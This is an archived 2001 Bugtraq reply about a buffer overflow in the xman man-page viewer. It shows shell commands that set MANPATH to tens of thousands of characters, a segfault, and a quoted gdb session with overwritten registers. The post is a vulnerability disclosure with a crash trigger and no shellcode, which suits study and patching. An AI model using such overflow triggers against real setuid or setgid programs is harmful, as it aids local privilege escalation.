[21532] in bugtraq

home help back first fref pref prev next nref lref last post

Re: suid xman 3.1.6 overflows

daemon@ATHENA.MIT.EDU (Matias Sedalo)
Mon Jul 16 12:57:02 2001

Date: Mon, 16 Jul 2001 03:16:11 -0400 (ART)
From: Matias Sedalo <s0t4ipv6@shellcode.com.ar>
Cc: bugtraq@securityfocus.com
In-Reply-To: <3B4D1A61.F1681F89@snosoft.com>
Message-ID: <Pine.LNX.4.21.0107160312250.18166-100000@mother.xunil.com.ar>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


The file /usr/X11R6/bin/xman isn't setuid in slackware 7.1/7.2/8.0
but...

s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 7000'`
s0t4ipv6@gohan:~$ xman
Xman Error: No manual pages found.
s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 70000'`
s0t4ipv6@gohan:~$ xman
Segmentation fault
s0t4ipv6@gohan:~$ uname -a 
Linux gohan 2.4.5 #4 SMP Thu Jul 12 22:22:32 ART 2001 i686 unknown

================================================================
Matias Sedalo.______________________http://www.shellcode.com.ar/

On Wed, 11 Jul 2001, KF wrote:

> xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
> overflow.
> 
> srtxg@chanae.alphanet.ch is noted as the packager of this RPM. I do not
> know the author.
> 
> [root@linux lib]# ls -al `which xman`
> -rwxr-sr-x    1 root     man         41076 Jun 17  1998 /usr/X11R6/bin/xman*
> 
> [root@linux lib]# xman
> [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
> [root@linux lib]# xman
> Xman Error: Could not allocate memory for manual sections.
> 
> [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
> [root@linux lib]# xman
> Segmentation fault
> 
> [root@linux lib]# gdb xman
> GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
> (gdb) run
> Starting program: /usr/X11R6/bin/xman
> 0x4022fb66 in getenv () from /lib/libc.so.6
> (gdb) bt
> #0  0x4022fb66 in getenv () from /lib/libc.so.6
> #1  0x0804bc47 in _start ()
> #2  0x41414141 in ?? ()
> Cannot access memory at address 0x41414141
> 
> (gdb) info registers
> eax            0xbffee784       -1073813628
> ecx            0x804fb29        134544169
> edx            0x805414c        134562124
> ebx            0x40328f2c       1077055276
> esp            0xbffec6fc       0xbffec6fc
> ebp            0xbffec714       0xbffec714
> esi            0x6      6
> edi            0x41414141       1094795585
> eip            0x4022fb66       0x4022fb66
> 
> -KF
> 

